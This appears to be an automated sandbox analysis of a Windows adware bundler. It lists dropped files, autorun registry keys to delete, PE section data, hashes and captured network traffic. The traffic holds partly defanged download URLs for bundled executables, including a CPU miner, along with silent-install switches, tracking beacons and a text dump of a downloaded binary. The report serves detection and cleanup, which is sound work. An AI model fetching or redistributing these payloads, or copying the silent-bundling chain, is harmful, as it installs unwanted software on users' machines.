%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 11665408 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 11857920 | 17152 | 17408 | 4.10655 | a504ed888327f013e9b6042c9ab3920f |
Dropped from:
2258b2fa478c5298d2989e18828980d3
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 12
cd94fdb6cad0a1bdfdd660de105c7c7e
9ffcde27b445393ee950de1371e7c43b
7975cef8969d02a0cabd784a3c74c8cb
97e4952df76a56d68e69044e1a43d39f
780fc5ed47f296c4e1b277c467eafa42
9afaab770c0e2b9d5905c10288742f99
e9c53b8632b68f0292577f666a972eb4
6f4730a0be5e8067038de9457fdac074
e85909bb2d7c5931b7f2139fefceab0e
6cd2ca94541223158754aefc3f898dd4
8537c506876458e69f1ae9ab7fe92f6c
df84eb115ec1c2bc974734c43acd2d72
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.163.246.254 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.162 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.86.58 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://ipgeoapi.com/ | 54.235.206.35 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 | |
hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe | 54.239.168.52 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.47 |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI | 188.165.238.33 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.33 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 94.23.193.213 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 | 188.165.238.33 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 | 188.165.238.33 |
hxxp://s3-website-us-east-1.amazonaws.com/setup_362.exe | |
hxxp://djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | |
hxxp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe | 54.239.168.173 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.10 |
hxxp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe | 54.231.33.60 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 | 54.231.9.84 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 | 54.231.9.84 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe | 205.185.216.42 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.137.144 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 | 54.231.9.84 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 | 54.231.48.154 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 | 54.231.9.84 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.10 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 | 69.16.175.10 |
hxxp://www.djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | 52.1.45.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 | 54.231.9.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 | 54.231.9.84 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 | 54.231.9.84 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.10 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 37.59.30.197 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.10 |
s3.amazonaws.com | 54.231.97.211 |
upd.adskyforever.com | 91.121.172.208 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 22:45:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
3dd..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Fri, 25 Sep 2015 22:45:00 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..3dd..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..hXXps://s3.amazonaws.
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 22:45:11 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=wEvFLQF.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:24 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1443221184; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443221184498979; path=/; expires=Sun, 25-Oct-15 22:46:24 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=7507 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443221146.dop005.fr7.t,1443221146.cds054.fr7.c
GIF89a.............,...........D..;..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
